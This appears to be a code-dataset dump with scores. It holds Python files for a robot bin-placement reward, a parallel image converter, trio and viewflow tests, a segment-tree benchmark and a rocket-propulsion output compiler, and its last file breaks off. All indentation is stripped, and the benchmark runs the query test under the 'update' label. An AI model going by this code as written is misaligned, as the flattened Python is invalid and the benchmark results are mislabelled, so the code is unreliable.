object_geoms=[g for g in self.object.contact_geoms])
r_grasp = int(is_grasping) * grasp_mult
# lifting reward for picking up an object
r_lift = 0.
if not self.object_in_bin and r_grasp > 0.:
z_target = self.bin2_pos[2] + 0.25
object_z_loc = self.sim.data.body_xpos[self.obj_body_id, 2]
z_dist = np.abs(z_target - object_z_loc)
r_lift = grasp_mult + (1 - np.tanh(5.0 * z_dist)) * (
lift_mult - grasp_mult
)
# segment objects into left of the bins and above the bins
object_xy_loc = self.sim.data.body_xpos[self.obj_body_id, :2]
y_check = (
np.abs(object_xy_loc[1] -
self.bin2_pos[1])
< self.bin2_size[1]
)
x_check = (
np.abs(object_xy_loc[0] -
self.bin2_pos[0])
< self.bin2_size[0]
)
object_above_bin = x_check and y_check
# hover reward for getting object above bin
r_hover = 0.
r_drop = 0.
if not self.object_in_bin and r_lift > 0.45:
dist = np.linalg.norm(
self.bin2_pos[:2] - object_xy_loc
)
# objects to the left get r_lift added to hover reward,
# those on the right get max(r_lift) added (to encourage dropping)
if not object_above_bin:
r_hover = r_lift + (
1 - np.tanh(2.0 * dist)
) * (hover_mult - lift_mult)
else:
r_hover = lift_mult + (
1 - np.tanh(2.0 * dist)
) * (hover_mult - lift_mult)
if r_grasp > 0 and object_above_bin:
z_target = self.bin2_pos[2] + 0.1
object_z_loc = self.sim.data.body_xpos[self.obj_body_id, 2]
z_dist = np.maximum(object_z_loc - z_target, 0.)
r_drop = hover_mult + \
(1 - np.tanh(5.0 * z_dist)) * (drop_mult - hover_mult)
# print('is_grasping:', is_grasping, 'was_grasping:', self.was_grasping, 'gripper_pos:', self.sim.data.site_xpos[self.robots[0].eef_site_id, 2], 'target_h:', self.bin2_pos[2] + 0.1 )
# TODO: this height is arbitrary and won't work for eg milk and cereal
if (not is_grasping) and self.was_grasping and self.sim.data.site_xpos[self.robots[0].eef_site_id, 2] > self.bin2_pos[2] + 0.1:
self.dropped_object = True
self.was_grasping = is_grasping
return r_align, r_reach, r_grasp, r_lift, r_hover, r_drop
def not_in_bin(self, obj_pos):
bin_x_low = self.bin2_pos[0] - self.bin2_size[0]
bin_y_low = self.bin2_pos[1] - self.bin2_size[1]
bin_x_high = self.bin2_pos[0] + self.bin2_size[0]
bin_y_high = self.bin2_pos[1] + self.bin2_size[1]
res = True
if (
bin_x_low < obj_pos[0] < bin_x_high
and bin_y_low < obj_pos[1] < bin_y_high
and self.bin2_pos[2] < obj_pos[2] < self.bin2_pos[2] + 0.1
):
res = False
return res
def _get_placement_initializer(self):
"""
Helper function for defining placement initializer and object sampling bounds.
"""
super()._get_placement_initializer()
bin_x_low = -self.bin2_size[0] / 2
bin_y_low = -self.bin2_size[1] / 2
bin_x_high = self.bin2_size[0] / 2
bin_y_high = self.bin2_size[1] / 2
# TODO: why is this not exactly in the middle
self.placement_initializer.append_sampler(
sampler=UniformRandomSampler(
name=f"{self.visual_object.name}ObjectSampler",
mujoco_objects=self.visual_object,
x_range=[bin_x_low, bin_x_high],
y_range=[bin_y_low, bin_y_high],
rotation=0.,
rotation_axis='z',
ensure_object_boundary_in_range=False,
ensure_valid_placement=False,
reference_pos=self.bin2_pos,
z_offset=self.bin2_pos[2] - self.bin1_pos[2],
)
)
def _load_model(self):
"""
Loads an xml model, puts it in self.model
"""
# load model for table top workspace
self.mujoco_arena = PickPlaceArena(
bin1_pos=self.bin1_pos,
)
# Load model propagation
super()._load_model()
# Generate placement initializer
self._initialize_model()
self._get_placement_initializer()
def _setup_references(self):
"""
Sets up references to important components. A reference is typically an
index or a list of indices that point to the corresponding elements
in a flatten array, which is how MuJoCo stores physical simulation data.
"""
# keep track of which objects are in their corresponding bins
self.object_in_bin = False
# target locations in bin for each object type
self.target_bin_placements = np.zeros((1, 3))
# TODO: fix this once i understand why its here
# I think we can remove target bin placements
bin_x_low = self.bin2_pos[0]
bin_y_low = self.bin2_pos[1]
bin_x_low += self.bin2_size[0] / 2.
bin_y_low += self.bin2_size[1] / 2.
self.target_bin_placements[0, :] = [
bin_x_low, bin_y_low, self.bin2_pos[2]]
super()._setup_references()
def _reset_internal(self):
"""
Resets simulation internal configurations.
"""
super()._reset_internal()
self.was_grasping = False
# Set the bins to the desired position
self.sim.model.body_pos[self.sim.model.body_name2id(
"bin1")] = self.bin1_pos
self.sim.model.body_pos[self.sim.model.body_name2id(
"bin2")] = self.bin2_pos
def _check_success(self):
"""
Check if all objects have been successfully placed in their corresponding bins.
Returns:
bool: True if object is placed correctly
"""
# remember objects that are in the correct bins
gripper_site_pos = self.sim.data.site_xpos[self.robots[0].eef_site_id]
obj_pos = self.sim.data.body_xpos[self.obj_body_id]
dist = np.linalg.norm(gripper_site_pos - obj_pos)
r_reach = 1 - np.tanh(10.0 * dist)
# self.object_in_bin = not self.not_in_bin(obj_pos)
self.object_in_bin = bool(
(not self.not_in_bin(obj_pos)) and r_reach > 0.35)
return self.object_in_bin
def _post_action(self, action):
"""
Do any housekeeping after taking an action.
Args:
action (np.array): Action to execute within the environment
Returns:
3-tuple:
- (float) reward from the environment
- (bool) whether the current episode is completed or not
- (dict) empty dict to be filled with information by subclassed method
"""
reward = self.reward(action)
# done if number of elapsed timesteps is greater than horizon
# self.dropped_object or ((self.timestep >= self.horizon) and not self.ignore_done)
self.done = False
self.dropped_object = False
return reward, self.done, {} | 0.781497 | 0.482795 |
from absl import logging
from joblib import Parallel, delayed
from PIL import ImageFile
import atlasmaker_io
import convert
def get_and_convert_image(image_location, image_convert_settings,
allow_truncated_images=False, disk_cache=False,
request_timeout=60, http_max_retries=2):
"""Wrapper method that retrieves and converts one image.
If run all in-memory (i.e., no disk spill), then returns PIL Image object.
Otherwise returns path of disk-cached image.
Args:
image_location: Image path from the input list of locations.
image_convert_settings: ImageConvertSettings object.
allow_truncated_images: If True, PIL will be tolerant of truncated image
files and load/process them. Note that this isn't
supported on old versions on PIL, just pillow.
disk_cache: Store intermediary image objects to disk. Not supported yet.
request_timeout: Max secs for http requests before timeout.
http_max_retries: Max number of attempts we will try to retrive http images
due to timeout errors.
Returns:
A tuple (Image object or None if fails, status message string). Status
message string will be empty if success, or error message if failure.
Exceptions handled:
All exceptions for image retrieval are handled. Some notable ones are:
- DecompressionBombError: Image is too large (>0.5G). See PIL
documentation for instructions on setting a
higher threshold.
For image conversion, the following errors are handled:
- IOError: error retrieving image file, or truncated image file.
"""
if disk_cache:
raise NotImplementedError()
if allow_truncated_images:
try:
ImageFile.LOAD_TRUNCATED_IMAGES = True
except AttributeError as e:
logging.warning('Are you using PILLOW and not a very old version of PIL? '
'Unable to force load of truncated image files: %s', e)
try:
src_image = atlasmaker_io.get_image(image_location, request_timeout,
http_max_retries=http_max_retries)
except Exception as e:
logging.error('Retrieval of file %s failed with error: %s',
image_location, e)
return None, str(e)
try:
image_converter = convert.ImageConverter(src_image, image_convert_settings)
logging.debug('Successfully converted image: %s' % image_location)
return image_converter.convert(), ''
except IOError as e:
logging.error('Conversion of file %s failed with error: %s',
image_location, e)
return None, str(e)
def get_and_convert_images_parallel(image_src_locations, image_convert_settings,
n_jobs=-1, disk_cache=False, threads=False,
verbose=10, allow_truncated_images=False,
request_timeout=60, http_max_retries=2):
"""Parallelize retrieving and converting image tasks.
Args:
images: List of source image paths (filepaths, URLs, etc).
image_convert_settings: ImageConvertSettings object.
disk_cache:: If True, will cache converted images to disk.
threads: If true, use threads instead of processes.
verbose: verbosity level for parallel. See joblib.Parallel documentation.
allow_truncated_images: If True, PIL will be tolerant of truncated image
files and load/process them. Note that this isn't
supported on old versions on PIL, just pillow.
request_timeout: Max secs for http requests before timeout.
http_max_retries: Max number of attempts we will try to retrive http images
due to timeout errors.
Returns:
List of tuples, where each tuple contains
(converted Image object or None, status/error message string).
"""
logging.info('Parallelizing with setting %d jobs' % n_jobs)
backend = None
if threads:
logging.debug('Parallelizing using threads.')
backend = 'threading'
outputs = Parallel(n_jobs=n_jobs, backend=backend, verbose=verbose)(
delayed(get_and_convert_image)(
location, image_convert_settings,
allow_truncated_images=allow_truncated_images,
disk_cache=disk_cache, request_timeout=request_timeout,
http_max_retries=http_max_retries)
for location in image_src_locations)
return outputs
def convert_default_image(image_location, image_convert_settings):
"""Return converted default image used for failures
Args:
image_location: Path or URL of image.
image_convert_settings: ImageConvertSettings object.
"""
default_img, status = get_and_convert_image(
image_location, image_convert_settings=image_convert_settings)
del status # linter.
if default_img is None:
raise IOError('Unable to retrive and convert default image.')
return default_img | facets_atlasmaker/parallelize.py |
from absl import logging
from joblib import Parallel, delayed
from PIL import ImageFile
import atlasmaker_io
import convert
def get_and_convert_image(image_location, image_convert_settings,
allow_truncated_images=False, disk_cache=False,
request_timeout=60, http_max_retries=2):
"""Wrapper method that retrieves and converts one image.
If run all in-memory (i.e., no disk spill), then returns PIL Image object.
Otherwise returns path of disk-cached image.
Args:
image_location: Image path from the input list of locations.
image_convert_settings: ImageConvertSettings object.
allow_truncated_images: If True, PIL will be tolerant of truncated image
files and load/process them. Note that this isn't
supported on old versions on PIL, just pillow.
disk_cache: Store intermediary image objects to disk. Not supported yet.
request_timeout: Max secs for http requests before timeout.
http_max_retries: Max number of attempts we will try to retrive http images
due to timeout errors.
Returns:
A tuple (Image object or None if fails, status message string). Status
message string will be empty if success, or error message if failure.
Exceptions handled:
All exceptions for image retrieval are handled. Some notable ones are:
- DecompressionBombError: Image is too large (>0.5G). See PIL
documentation for instructions on setting a
higher threshold.
For image conversion, the following errors are handled:
- IOError: error retrieving image file, or truncated image file.
"""
if disk_cache:
raise NotImplementedError()
if allow_truncated_images:
try:
ImageFile.LOAD_TRUNCATED_IMAGES = True
except AttributeError as e:
logging.warning('Are you using PILLOW and not a very old version of PIL? '
'Unable to force load of truncated image files: %s', e)
try:
src_image = atlasmaker_io.get_image(image_location, request_timeout,
http_max_retries=http_max_retries)
except Exception as e:
logging.error('Retrieval of file %s failed with error: %s',
image_location, e)
return None, str(e)
try:
image_converter = convert.ImageConverter(src_image, image_convert_settings)
logging.debug('Successfully converted image: %s' % image_location)
return image_converter.convert(), ''
except IOError as e:
logging.error('Conversion of file %s failed with error: %s',
image_location, e)
return None, str(e)
def get_and_convert_images_parallel(image_src_locations, image_convert_settings,
n_jobs=-1, disk_cache=False, threads=False,
verbose=10, allow_truncated_images=False,
request_timeout=60, http_max_retries=2):
"""Parallelize retrieving and converting image tasks.
Args:
images: List of source image paths (filepaths, URLs, etc).
image_convert_settings: ImageConvertSettings object.
disk_cache:: If True, will cache converted images to disk.
threads: If true, use threads instead of processes.
verbose: verbosity level for parallel. See joblib.Parallel documentation.
allow_truncated_images: If True, PIL will be tolerant of truncated image
files and load/process them. Note that this isn't
supported on old versions on PIL, just pillow.
request_timeout: Max secs for http requests before timeout.
http_max_retries: Max number of attempts we will try to retrive http images
due to timeout errors.
Returns:
List of tuples, where each tuple contains
(converted Image object or None, status/error message string).
"""
logging.info('Parallelizing with setting %d jobs' % n_jobs)
backend = None
if threads:
logging.debug('Parallelizing using threads.')
backend = 'threading'
outputs = Parallel(n_jobs=n_jobs, backend=backend, verbose=verbose)(
delayed(get_and_convert_image)(
location, image_convert_settings,
allow_truncated_images=allow_truncated_images,
disk_cache=disk_cache, request_timeout=request_timeout,
http_max_retries=http_max_retries)
for location in image_src_locations)
return outputs
def convert_default_image(image_location, image_convert_settings):
"""Return converted default image used for failures
Args:
image_location: Path or URL of image.
image_convert_settings: ImageConvertSettings object.
"""
default_img, status = get_and_convert_image(
image_location, image_convert_settings=image_convert_settings)
del status # linter.
if default_img is None:
raise IOError('Unable to retrive and convert default image.')
return default_img | 0.831759 | 0.334589 |
import random
import pytest
import trio
from ddht.resource_queue import ResourceQueue
async def _yield(num: int = 10, base: int = 0):
for _ in range(random.randint(0, num) + base):
await trio.lowlevel.checkpoint()
@pytest.mark.trio
async def test_resource_queue_fuzzy():
known_resources = {"a", "b", "c", "d"}
queue = ResourceQueue(known_resources)
resources_in_use = set()
seen_resources = set()
async def worker(seen):
"""
Worker process intended to try and hit as many edge cases as possible
about what could happen within the context block of
`ResourceQueue.reserve` by yielding to trio at as many stages as
possible.
"""
while True:
async with queue.reserve() as resource:
seen.add(resource)
assert resource in queue
await _yield()
assert resource not in resources_in_use
resources_in_use.add(resource)
await _yield()
resources_in_use.remove(resource)
await _yield()
assert resource not in resources_in_use
async with trio.open_nursery() as nursery:
for _ in range(10):
nursery.start_soon(worker, seen_resources)
await _yield(1, 500)
assert seen_resources == queue.resources
assert "e" not in queue
assert "f" not in queue
# Now add two more resources. They should get picked up by the new
# workers.
await queue.add("e")
await queue.add("f")
assert "e" in queue
assert "f" in queue
await _yield(1, 500)
seen_resources_after_add = set()
for _ in range(10):
nursery.start_soon(worker, seen_resources_after_add)
await _yield(1, 500)
assert seen_resources_after_add == queue.resources
nursery.cancel_scope.cancel()
@pytest.mark.trio
async def test_resource_queue_add_idempotent():
queue = ResourceQueue(("a", "b", "c"))
assert len(queue) == 3
await queue.add("a")
assert len(queue) == 3
await queue.add("d")
assert len(queue) == 4
@pytest.mark.trio
async def test_resource_queue_remove_idempotent():
queue = ResourceQueue(("a", "b", "c"))
assert len(queue) == 3
await queue.remove("a")
assert len(queue) == 2
await queue.remove("a") | tests/core/test_resource_queue.py | import random
import pytest
import trio
from ddht.resource_queue import ResourceQueue
async def _yield(num: int = 10, base: int = 0):
for _ in range(random.randint(0, num) + base):
await trio.lowlevel.checkpoint()
@pytest.mark.trio
async def test_resource_queue_fuzzy():
known_resources = {"a", "b", "c", "d"}
queue = ResourceQueue(known_resources)
resources_in_use = set()
seen_resources = set()
async def worker(seen):
"""
Worker process intended to try and hit as many edge cases as possible
about what could happen within the context block of
`ResourceQueue.reserve` by yielding to trio at as many stages as
possible.
"""
while True:
async with queue.reserve() as resource:
seen.add(resource)
assert resource in queue
await _yield()
assert resource not in resources_in_use
resources_in_use.add(resource)
await _yield()
resources_in_use.remove(resource)
await _yield()
assert resource not in resources_in_use
async with trio.open_nursery() as nursery:
for _ in range(10):
nursery.start_soon(worker, seen_resources)
await _yield(1, 500)
assert seen_resources == queue.resources
assert "e" not in queue
assert "f" not in queue
# Now add two more resources. They should get picked up by the new
# workers.
await queue.add("e")
await queue.add("f")
assert "e" in queue
assert "f" in queue
await _yield(1, 500)
seen_resources_after_add = set()
for _ in range(10):
nursery.start_soon(worker, seen_resources_after_add)
await _yield(1, 500)
assert seen_resources_after_add == queue.resources
nursery.cancel_scope.cancel()
@pytest.mark.trio
async def test_resource_queue_add_idempotent():
queue = ResourceQueue(("a", "b", "c"))
assert len(queue) == 3
await queue.add("a")
assert len(queue) == 3
await queue.add("d")
assert len(queue) == 4
@pytest.mark.trio
async def test_resource_queue_remove_idempotent():
queue = ResourceQueue(("a", "b", "c"))
assert len(queue) == 3
await queue.remove("a")
assert len(queue) == 2
await queue.remove("a") | 0.612541 | 0.36869 |
from django.conf.urls import include, url
from django.contrib.auth.models import User
from django.db import models
from django.test import TestCase, RequestFactory
from django.urls import resolve
from django.views import generic
from viewflow import flow
from viewflow.activation import STATUS
from viewflow.base import Flow, this
from viewflow.flow import views, viewset
class Test(TestCase):
def test_startview_mixin_with_create_view(self):
class StartView(views.StartFlowMixin, generic.CreateView):
model = StartViewFlowEntity
fields = []
view = StartView.as_view()
user = User.objects.create(username='test', is_superuser=True)
# get
request = RequestFactory().get('/start/')
request.user = user
request.resolver_match = resolve('/test/start/')
response = view(request, flow_class=StartViewTestFlow, flow_task=StartViewTestFlow.start)
self.assertEqual(response.template_name,
('tests/test_views_start/startviewtest/start.html',
'tests/test_views_start/startviewtest/start.html',
'viewflow/flow/start.html'))
# post
request = RequestFactory().post('/start/')
request.user = user
request.resolver_match = resolve('/test/start/')
response = view(request, flow_class=StartViewTestFlow, flow_task=StartViewTestFlow.start)
self.assertEqual(response.status_code, 302)
process = StartViewTestFlow.process_class.objects.all()[0]
process.get_task(StartViewTestFlow.start, status=[STATUS.DONE])
def test_startprocess_view(self):
view = views.CreateProcessView.as_view()
user = User.objects.create(username='test', is_superuser=True)
# get
request = RequestFactory().get('/start/')
request.user = user
request.resolver_match = resolve('/test/start/')
response = view(request, flow_class=StartViewTestFlow, flow_task=StartViewTestFlow.start)
self.assertEqual(response.template_name,
('tests/test_views_start/startviewtest/start.html',
'tests/test_views_start/startviewtest/start.html',
'viewflow/flow/start.html'))
# post
request = RequestFactory().post('/start/')
request.user = user
request.resolver_match = resolve('/test/start/')
response = view(request, flow_class=StartViewTestFlow, flow_task=StartViewTestFlow.start)
self.assertEqual(response.status_code, 302)
process = StartViewTestFlow.process_class.objects.all()[0]
process.get_task(StartViewTestFlow.start, status=[STATUS.DONE])
class StartViewTestFlow(Flow):
start = flow.Start().Next(this.end)
end = flow.End()
class StartViewFlowEntity(models.Model):
pass
urlpatterns = [
url(r'^test/', include((viewset.FlowViewSet(StartViewTestFlow).urls, 'startviewtest')))
]
try:
from django.test import override_settings
Test = override_settings(ROOT_URLCONF=__name__)(Test)
except ImportError:
"""
django 1.6
"""
Test.urls = __name__ | Scripts/ict/tests/test_views_start.py | from django.conf.urls import include, url
from django.contrib.auth.models import User
from django.db import models
from django.test import TestCase, RequestFactory
from django.urls import resolve
from django.views import generic
from viewflow import flow
from viewflow.activation import STATUS
from viewflow.base import Flow, this
from viewflow.flow import views, viewset
class Test(TestCase):
def test_startview_mixin_with_create_view(self):
class StartView(views.StartFlowMixin, generic.CreateView):
model = StartViewFlowEntity
fields = []
view = StartView.as_view()
user = User.objects.create(username='test', is_superuser=True)
# get
request = RequestFactory().get('/start/')
request.user = user
request.resolver_match = resolve('/test/start/')
response = view(request, flow_class=StartViewTestFlow, flow_task=StartViewTestFlow.start)
self.assertEqual(response.template_name,
('tests/test_views_start/startviewtest/start.html',
'tests/test_views_start/startviewtest/start.html',
'viewflow/flow/start.html'))
# post
request = RequestFactory().post('/start/')
request.user = user
request.resolver_match = resolve('/test/start/')
response = view(request, flow_class=StartViewTestFlow, flow_task=StartViewTestFlow.start)
self.assertEqual(response.status_code, 302)
process = StartViewTestFlow.process_class.objects.all()[0]
process.get_task(StartViewTestFlow.start, status=[STATUS.DONE])
def test_startprocess_view(self):
view = views.CreateProcessView.as_view()
user = User.objects.create(username='test', is_superuser=True)
# get
request = RequestFactory().get('/start/')
request.user = user
request.resolver_match = resolve('/test/start/')
response = view(request, flow_class=StartViewTestFlow, flow_task=StartViewTestFlow.start)
self.assertEqual(response.template_name,
('tests/test_views_start/startviewtest/start.html',
'tests/test_views_start/startviewtest/start.html',
'viewflow/flow/start.html'))
# post
request = RequestFactory().post('/start/')
request.user = user
request.resolver_match = resolve('/test/start/')
response = view(request, flow_class=StartViewTestFlow, flow_task=StartViewTestFlow.start)
self.assertEqual(response.status_code, 302)
process = StartViewTestFlow.process_class.objects.all()[0]
process.get_task(StartViewTestFlow.start, status=[STATUS.DONE])
class StartViewTestFlow(Flow):
start = flow.Start().Next(this.end)
end = flow.End()
class StartViewFlowEntity(models.Model):
pass
urlpatterns = [
url(r'^test/', include((viewset.FlowViewSet(StartViewTestFlow).urls, 'startviewtest')))
]
try:
from django.test import override_settings
Test = override_settings(ROOT_URLCONF=__name__)(Test)
except ImportError:
"""
django 1.6
"""
Test.urls = __name__ | 0.424173 | 0.20454 |
import operator
import random
import statistics
import timeit
from typing import Any, List, Type
import tabulate
import pysegmenttree._pysegmenttree_py
import pysegmenttree.c_extensions
def get_random_query(start: int, end: int):
query = [random.randint(start, end), random.randint(start, end)]
query.sort()
return query
def bench_build(tree_cls: Type, size: int = 1_000_000):
print(f"\n{tree_cls.__name__}: build")
print(f"Tree size: {size}")
random.seed(42)
container = [random.randint(-100, 100) for _ in range(size)]
context = {**globals(), **locals()}
return timeit.repeat(
f"{tree_cls.__module__}.{tree_cls.__name__}(container)",
globals=context,
number=1,
repeat=5,
)
def bench_query(tree_cls: Type, size: int = 100_000, queries: int = 10000):
print(f"\n{tree_cls.__name__}: query")
print(f"Tree size: {size}, queries count: {queries}")
random.seed(42)
container = [random.randint(-100, 100) for _ in range(size)]
tree = tree_cls(container)
prepared_queries = [get_random_query(0, size - 1) for _ in range(queries)]
context = {**globals(), **locals()}
return timeit.repeat(
"for query in prepared_queries: tree.query(*query)",
globals=context,
number=1,
repeat=5,
)
def bench_update(tree_cls: Type, size: int = 100_000, queries: int = 10000):
print(f"\n{tree_cls.__name__}: update")
print(f"Tree size: {size}, queries count: {queries}")
random.seed(42)
container = [random.randint(-100, 100) for _ in range(size)]
tree = tree_cls(container)
prepared_queries = [
[random.randint(0, size - 1), random.randint(-100, 100)] for _ in range(queries)
]
context = {**globals(), **locals()}
return timeit.repeat(
"for query in prepared_queries: tree.update(*query)",
globals=context,
number=1,
repeat=5,
)
IMPLEMENTATIONS = [
pysegmenttree._pysegmenttree_py.PySegmentTree,
pysegmenttree.c_extensions.IntSegmentTree,
pysegmenttree.c_extensions.FloatSegmentTree,
]
BENCHES = {
"build": bench_build,
"query": bench_query,
"update": bench_query,
}
if __name__ == "__main__":
results_table = [["-", *(impl.__name__ for impl in IMPLEMENTATIONS)]]
for bench, func in BENCHES.items():
results_table.append([bench])
for tree_cls in IMPLEMENTATIONS:
timeit_results = func(tree_cls)
mean = statistics.mean(timeit_results)
results_table[-1].append(mean)
print(tabulate.tabulate(results_table, headers="firstrow", tablefmt="grid")) | benchmarks/benchmark.py | import operator
import random
import statistics
import timeit
from typing import Any, List, Type
import tabulate
import pysegmenttree._pysegmenttree_py
import pysegmenttree.c_extensions
def get_random_query(start: int, end: int):
query = [random.randint(start, end), random.randint(start, end)]
query.sort()
return query
def bench_build(tree_cls: Type, size: int = 1_000_000):
print(f"\n{tree_cls.__name__}: build")
print(f"Tree size: {size}")
random.seed(42)
container = [random.randint(-100, 100) for _ in range(size)]
context = {**globals(), **locals()}
return timeit.repeat(
f"{tree_cls.__module__}.{tree_cls.__name__}(container)",
globals=context,
number=1,
repeat=5,
)
def bench_query(tree_cls: Type, size: int = 100_000, queries: int = 10000):
print(f"\n{tree_cls.__name__}: query")
print(f"Tree size: {size}, queries count: {queries}")
random.seed(42)
container = [random.randint(-100, 100) for _ in range(size)]
tree = tree_cls(container)
prepared_queries = [get_random_query(0, size - 1) for _ in range(queries)]
context = {**globals(), **locals()}
return timeit.repeat(
"for query in prepared_queries: tree.query(*query)",
globals=context,
number=1,
repeat=5,
)
def bench_update(tree_cls: Type, size: int = 100_000, queries: int = 10000):
print(f"\n{tree_cls.__name__}: update")
print(f"Tree size: {size}, queries count: {queries}")
random.seed(42)
container = [random.randint(-100, 100) for _ in range(size)]
tree = tree_cls(container)
prepared_queries = [
[random.randint(0, size - 1), random.randint(-100, 100)] for _ in range(queries)
]
context = {**globals(), **locals()}
return timeit.repeat(
"for query in prepared_queries: tree.update(*query)",
globals=context,
number=1,
repeat=5,
)
IMPLEMENTATIONS = [
pysegmenttree._pysegmenttree_py.PySegmentTree,
pysegmenttree.c_extensions.IntSegmentTree,
pysegmenttree.c_extensions.FloatSegmentTree,
]
BENCHES = {
"build": bench_build,
"query": bench_query,
"update": bench_query,
}
if __name__ == "__main__":
results_table = [["-", *(impl.__name__ for impl in IMPLEMENTATIONS)]]
for bench, func in BENCHES.items():
results_table.append([bench])
for tree_cls in IMPLEMENTATIONS:
timeit_results = func(tree_cls)
mean = statistics.mean(timeit_results)
results_table[-1].append(mean)
print(tabulate.tabulate(results_table, headers="firstrow", tablefmt="grid")) | 0.668447 | 0.284116 |
import numpy as np
import json
import scipy.signal
import matplotlib
import matplotlib.pyplot as plt
from helpers.misc import loadmat, Struct
def compile_outputs(data: dict, output_file_path: str) -> tuple:
g_0 = 9.80665 # [m/s^2] Gravitational acceleration constant
design = dict()
record = loadmat(output_file_path)["record"] # Custom loadmat to solve bad formatting
max_thrust, m_dot_max, p_cc_max = get_max_thrust(record)
impulse = record["impulse"]
isp = record["Isp"]/g_0
# Mass of propellants
Mox_initial = record["m_ox"].flatten()[0]
Mox = record["m_ox"].flatten()[0] - record["m_ox"].flatten()[-1]
Vox = (Mox/data["rho_o"])*1e03 # [L]
Mfuel_initial = record["m_fuel"].flatten()[0]
Mfuel = record["m_fuel"].flatten()[0] - record["m_fuel"].flatten()[-1]
Vfuel = (Mfuel/data["rho_f"])*1e03 # [L]
of_ratio = Mox/Mfuel
avg_mdot_ox = np.mean(record["m_dot_ox"].flatten()[1:]) # First element is None
avg_mdot_fuel = np.mean(record["m_dot_fuel"].flatten()[1:]) # First element is None
# Propellant tank parameters
start_p_oxtank = record["p_oxtank"].flatten()[0]
end_p_oxtank = record["p_oxtank"].flatten()[-1]
start_p_fueltank = record["p_fueltank"].flatten()[0]
end_p_fueltank = record["p_fueltank"].flatten()[-1]
# Other parameters
exit_mach = get_filtered_max(record, record["M_e"].flatten())
local_c = np.sqrt(1.4*287.058*data["T_amb"]) # Local speed of sound, 1.4 gamma, 287.058 J/kg*K
burn_time = record["time"].flatten()[-1]
wet_mass = data["mass_dry_rocket"] + Mfuel_initial + Mox_initial
dry_mass = data["mass_dry_rocket"] + (Mfuel_initial-Mfuel) + (Mox_initial-Mox)
delta_v = isp*g_0*np.log(wet_mass/dry_mass)
# delta_v = exit_mach*local_c*np.log(wet_mass/dry_mass)
ideal_alt = 0.5*(delta_v**2)/g_0 # Simply using delta_K = delta_U; no air resistance
# Add vital data to output dictionary
# TODO: ADD MORE CRITICAL VALUES HERE; add values from data_dict to here
design["max_thrust"] = max_thrust
design["m_dot_max"] = m_dot_max
design["p_cc_max"] = p_cc_max
design["impulse"] = impulse
design["isp"] = isp
design["Mprop_used"] = Mox + Mfuel
design["Mox_initial"] = Mox_initial
design["Mox_used"] = Mox
design["Vox_used"] = Vox
design["Mfuel_initial"] = Mfuel_initial
design["Mfuel_used"] = Mfuel
design["Vfuel_used"] = Vfuel
design["of_ratio"] = of_ratio
design["avg_mdot_ox"] = avg_mdot_ox
design["avg_mdot_fuel"] = avg_mdot_fuel
design["start_p_oxtank"] = start_p_oxtank
design["end_p_oxtank"] = end_p_oxtank
design["start_p_fueltank"] = start_p_fueltank
design["end_p_fueltank"] = end_p_fueltank
design["A_inj_ox_eff"] = data["ox"]["injector_area"] # Only the injector area (orifice sizes)
design["A_inj_fuel_eff"] = data["fuel"]["injector_area"]
design["A_inj_o_only"] = data["ox"]["A_inj_o_only"] # Effective injector area (including Cv)
design["A_inj_f_only"] = data["ox"]["A_inj_f_only"]
design["exit_mach"] = exit_mach
design["burn_time"] = burn_time
design["ideal_delta_v"] = delta_v
design["ideal_alt"] = ideal_alt
# Cut off extraneous significant figures
for key, val in design.items():
design[key] = np.round(val, 4) if val > 0.1 else round(val, 5-int(np.floor(np.log10(abs(val))))-1)
# Export to JSON file
json_obj = json.dumps(design, indent=4, separators=(",", ": "))
prefix = output_file_path[:output_file_path.rfind("/")]
json_path = prefix + "/FinalDesignSummary.json"
with open(json_path, "w+") as f:
f.write(json_obj)
return design, json_path
def get_max_thrust(record: dict) -> tuple:
""" Filters out local spikes and finds max thrust, mdot, and chamber pressure. """
dt_filter = 0.1
dn_thrust_filter = np.ceil(dt_filter/np.mean(np.diff(record["time"])))
a = np.array([1])
b = (1/dn_thrust_filter * np.ones((int(dn_thrust_filter), 1))).flatten()
filtered_thrust = scipy.signal.lfilter(b, a, record["F_thrust"])
filtered_m_dot = scipy.signal.lfilter(b, a, record["m_dot_prop"])
filtered_p_cc = scipy.signal.lfilter(b, a, record["p_cc"])
max_ind = np.argmax(filtered_thrust)
max_thrust = filtered_thrust[max_ind]
m_dot_max = filtered_m_dot[max_ind]
p_cc_max = filtered_p_cc[max_ind]
return max_thrust, m_dot_max, p_cc_max
def get_filtered_max(record: dict, vals: list or np.ndarray) -> float:
dt_filter = 0.1
dn_filter = np.ceil(dt_filter/np.mean(np.diff(record["time"])))
a = np.array([1])
b = (1/dn_filter * np.ones((int(dn_filter), 1))).flatten()
filtered_val = scipy.signal.lfilter(b, a, vals)
max_ind = np.argmax(filtered_val)
return filtered_val[max_ind]
if __name__ == "__main__":
compile_outputs(dict(), "./case-files/test_case_2/PropSimOutput.mat") | helpers/output.py |
import numpy as np
import json
import scipy.signal
import matplotlib
import matplotlib.pyplot as plt
from helpers.misc import loadmat, Struct
def compile_outputs(data: dict, output_file_path: str) -> tuple:
g_0 = 9.80665 # [m/s^2] Gravitational acceleration constant
design = dict()
record = loadmat(output_file_path)["record"] # Custom loadmat to solve bad formatting
max_thrust, m_dot_max, p_cc_max = get_max_thrust(record)
impulse = record["impulse"]
isp = record["Isp"]/g_0
# Mass of propellants
Mox_initial = record["m_ox"].flatten()[0]
Mox = record["m_ox"].flatten()[0] - record["m_ox"].flatten()[-1]
Vox = (Mox/data["rho_o"])*1e03 # [L]
Mfuel_initial = record["m_fuel"].flatten()[0]
Mfuel = record["m_fuel"].flatten()[0] - record["m_fuel"].flatten()[-1]
Vfuel = (Mfuel/data["rho_f"])*1e03 # [L]
of_ratio = Mox/Mfuel
avg_mdot_ox = np.mean(record["m_dot_ox"].flatten()[1:]) # First element is None
avg_mdot_fuel = np.mean(record["m_dot_fuel"].flatten()[1:]) # First element is None
# Propellant tank parameters
start_p_oxtank = record["p_oxtank"].flatten()[0]
end_p_oxtank = record["p_oxtank"].flatten()[-1]
start_p_fueltank = record["p_fueltank"].flatten()[0]
end_p_fueltank = record["p_fueltank"].flatten()[-1]
# Other parameters
exit_mach = get_filtered_max(record, record["M_e"].flatten())
local_c = np.sqrt(1.4*287.058*data["T_amb"]) # Local speed of sound, 1.4 gamma, 287.058 J/kg*K
burn_time = record["time"].flatten()[-1]
wet_mass = data["mass_dry_rocket"] + Mfuel_initial + Mox_initial
dry_mass = data["mass_dry_rocket"] + (Mfuel_initial-Mfuel) + (Mox_initial-Mox)
delta_v = isp*g_0*np.log(wet_mass/dry_mass)
